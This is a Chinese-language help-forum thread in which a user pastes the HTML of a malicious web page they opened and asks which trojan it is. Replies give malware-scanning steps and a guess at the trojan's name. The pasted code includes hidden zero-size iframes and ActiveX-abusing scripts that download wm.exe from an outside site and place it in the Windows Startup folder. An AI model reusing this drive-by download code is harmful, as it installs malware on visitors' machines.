今天我收到一个这样的网页文件,代码是:

<iframe src=http://%77%77%77%2e%73%61%6e%73%61%6e%73%2e%63%6e/wm/ width=0 height=0></iframe>

我不小心打开了,这个应该肯定是病毒把,大家帮我看看是什么病毒,或者木马.谢谢

打开文件后

就会到这个

<iframe src=http://www.sansans.cn/wm/office.htm width=0 height=0></iframe>
<iframe src=http://www.sansans.cn/wm/sina.htm width=0 height=0></iframe>

然后

<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1=”http://www.sansans.cn/wm/wm.exe”;
install[”DownloadAndInstall”](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

最后

<html>
<object classid=’clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id=’obj’></object>
<script language=’javascript’>
var buf1 = ‘http://www.sansans.cn/wm/wm.exe’;
var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/wm.exe’;
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>


这个人的目的是想让我下载wm.exe  ,然后自动运行这个文件,


大伙帮我分析一下这个文件是什么病毒,我看看我的电脑现在是不是安全,怎么杀掉它

d

下载一个置顶贴里的SRENG工具(点击进2楼下载)

使用它扫描日志，将日志作为附件上传上来。
操作方法：
1、下载后解压缩，运行SREngLdr.exe；
2、如果无法打开尝试把SREngLdr.exe改名为123.BAT运行；
3、依次点击【智能扫描】-【扫描】，耐心等待，扫描结束后点击【保存报告】；
4、选择保存路径，文件名保持默认，直接点击【保存】，存为TXT格式；
5、将保存的报告附件上传而不是粘贴到帖子
注意：
扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等一切应用程序，扫描完毕后操作


好像是征途木马